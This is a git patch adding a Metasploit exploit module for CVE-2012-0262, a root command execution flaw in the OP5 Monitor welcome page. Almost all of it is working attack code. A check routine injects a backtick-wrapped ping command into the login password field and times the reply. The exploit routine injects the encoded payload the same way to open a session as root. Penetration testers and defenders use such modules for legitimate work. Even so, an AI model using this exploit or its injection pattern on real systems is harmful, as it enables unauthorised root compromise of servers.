From 4e858aba896c4be9d751c75ade9675d701c6c058 Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Sat, 7 Jan 2012 15:13:45 -0600
Subject: [PATCH] Add CVE-2012-0262 Op5 welcome.php Remote Code Execution

---
 modules/exploits/multi/http/op5_welcome.rb | 108 +++++++++++++++++++++
 1 file changed, 108 insertions(+)
 create mode 100644 modules/exploits/multi/http/op5_welcome.rb

diff --git a/modules/exploits/multi/http/op5_welcome.rb b/modules/exploits/multi/http/op5_welcome.rb
new file mode 100644
index 0000000000..84785e64da
--- /dev/null
+++ b/modules/exploits/multi/http/op5_welcome.rb
@@ -0,0 +1,108 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'        => 'OP5 welcome Remote Command Execution',
+			'Description' => %q{
+				This module exploits an arbitrary root command execution vulnerability in
+				OP5 Monitor welcome. Ekelöw has confirmed that OP5 Monitor versions 5.3.5,
+				5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable.
+			},
+			'Author'     => [ 'Peter Österberg <j[at]vel.nu>' ],
+			'License'    => MSF_LICENSE,
+			'References' =>
+				[
+					['CVE', '2012-0262'],
+					['OSVDB', '78065'],
+					['URL', 'http://www.ekelow.se/file_uploads/Advisories/ekelow-aid-2012-01.pdf'],
+					['URL', 'http://www.op5.com/news/support-news/fixed-vulnerabilities-op5-monitor-op5-appliance/'],
+					['URL', 'http://secunia.com/advisories/47417/'],
+				],
+			'Privileged' => true,
+			'Payload'    =>
+				{
+					'DisableNops' => true,
+					'Space'       => 1024,
+					'BadChars'    => '`\\|',
+					'Compat'      =>
+						{
+							'PayloadType' => 'cmd',
+							'RequiredCmd' => 'perl ruby',
+						}
+				},
+			'Platform'       => [ 'unix', 'linux' ],
+			'Arch'           => ARCH_CMD,
+			'Targets'        => [[ 'Automatic', { }]],
+			'DisclosureDate' => 'Jan 05 2012',
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				Opt::RPORT(443),
+				OptString.new('URI', [true, "The full URI path to /op5config/welcome", "/op5config/welcome"]),
+			], self.class)
+	end
+
+	def check
+		print_status("Attempting to detect if the OP5 Monitor is vulnerable...")
+		print_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}")
+
+		# Try running/timing 'ping localhost' to determine is system is vulnerable
+		start = Time.now
+
+		data = 'do=do=Login&password=`ping -c 10 127.0.0.1`';
+		res = send_request_cgi({
+			'uri'     => datastore['URI'],
+			'method'  => 'POST',
+			'proto'   => 'HTTPS',
+			'data'    => data,
+			'headers' =>
+			{
+				'Connection'     => 'close',
+			}
+		}, 25)
+		elapsed = Time.now - start
+		if elapsed >= 5
+			return Exploit::CheckCode::Vulnerable
+		end
+		return Exploit::CheckCode::Safe
+	end
+
+	def exploit
+		print_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}")
+
+		data = 'do=do=Login&password=`' + payload.encoded + '`';
+
+		res = send_request_cgi({
+			'uri'     => datastore['URI'],
+			'method'  => 'POST',
+			'proto'   => 'HTTPS',
+			'data'    => data,
+			'headers' =>
+			{
+				'Connection'     => 'close',
+			}
+		}, 10)
+
+		if(not res)
+			if session_created?
+				print_status("Session created, enjoy!")
+			else
+				print_error("No response from the server")
+			end
+			return
+		end
+	end
+end